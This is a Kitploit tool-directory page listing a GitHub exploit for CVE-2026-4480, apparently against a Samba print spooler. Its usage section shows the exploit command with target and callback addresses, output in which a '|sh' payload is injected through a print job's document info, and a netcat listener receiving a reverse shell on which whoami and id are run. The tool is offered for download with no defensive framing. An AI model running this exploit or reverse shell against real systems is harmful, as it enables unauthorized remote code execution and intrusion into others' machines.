Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-4480 — Exploit CVE-2026-4480 | Kitploit
Tools/GitHubGitHub/robinxiang/cve-2026-4480
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubrobinxiang/cve-2026-4480

CVE-2026-4480

Exploit CVE-2026-4480

View Repository
12 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

excute exploit:

root@kitploit:~
python ./exploit.py -t 10.129.20.16 -l 10.10.14.172 -p 8487
[*] Target: 10.129.20.16
[*] Callback: 10.10.14.172:8487
[*] Verify mode: False

[+] Credentials initialized (anonymous)
[+] Connected to spoolss interface
[+] Opened printer: HP-Reception
[+] Created DocumentInfo with payload: |sh
[+] Generated payload (78 bytes)
[*] Starting document...
[*] Starting page...
[*] Writing payload (78 bytes)...
[*] Ending page...
[*] Ending document (TRIGGERING EXPLOIT)...
[+] Print job submitted successfully!
[+] Closed printer handle

[+] Exploit completed!
[*] Check your listener for reverse shell...

nc -lvnp 8487

root@kitploit:~
─$ nc -lvnp 8487                                                                   
listening on [any] 8487 ...
connect to [10.10.14.172] from (UNKNOWN) [10.129.20.16] 40590
bash: cannot set terminal process group (16403): Inappropriate ioctl for device
bash: no job control in this shell
nobody@abducted:/var/spool/samba$ whoami
whoami
nobody
nobody@abducted:/var/spool/samba$ id
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@abducted:/var/spool/samba$ 
Download Tool